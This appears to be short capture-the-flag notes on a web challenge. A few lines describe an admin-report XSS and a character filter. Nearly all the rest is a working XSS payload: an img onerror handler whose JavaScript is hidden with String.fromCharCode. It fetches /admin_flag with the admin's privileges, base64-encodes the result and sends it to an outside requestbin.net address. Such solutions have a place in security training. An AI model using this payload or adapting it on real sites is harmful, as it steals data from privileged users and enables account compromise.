Can perform XSS by reporting to admin Admin dashboard has a link to /admin_flag Requesting admin_flag from a page with {, ", ', `, or gives an error
<img src="0" onerror="eval(String.fromCharCode(118,97,114,32,120,104,116,116,112,61,110,101,119,32,88,77,76,72,116,116,112,82,101,113,117,101,115,116,40,41,59,120,104,116,116,112,46,111,110,114,101,97,100,121,115,116,97,116,101,99,104,97,110,103,101,61,102,117,110,99,116,105,111,110,40,41,123,118,97,114,32,120,104,116,116,112,50,61,110,101,119,32,88,77,76,72,116,116,112,82,101,113,117,101,115,116,40,41,59,105,102,40,116,104,105,115,46,115,116,97,116,117,115,61,61,50,48,48,41,123,120,104,116,116,112,50,46,111,112,101,110,40,39,71,69,84,39,44,39,104,116,116,112,58,47,47,114,101,113,117,101,115,116,98,105,110,46,110,101,116,47,114,47,49,103,50,117,104,110,55,49,63,111,117,116,61,39,43,101,110,99,111,100,101,85,82,73,40,98,116,111,97,40,116,104,105,115,46,114,101,115,112,111,110,115,101,84,101,120,116,41,41,44,116,114,117,101,41,125,101,108,115,101,123,120,104,116,116,112,50,46,111,112,101,110,40,39,71,69,84,39,44,39,104,116,116,112,58,47,47,114,101,113,117,101,115,116,98,105,110,46,110,101,116,47,114,47,49,103,50,117,104,110,55,49,63,111,117,116,61,39,43,116,104,105,115,46,115,116,97,116,117,115,44,116,114,117,101,41,125,120,104,116,116,112,50,46,115,101,110,100,40,41,125,59,120,104,116,116,112,46,111,112,101,110,40,39,71,69,84,39,44,39,47,97,100,109,105,110,95,102,108,97,103,39,44,116,114,117,101,41,59,120,104,116,116,112,46,115,101,110,100,40,41,59))">
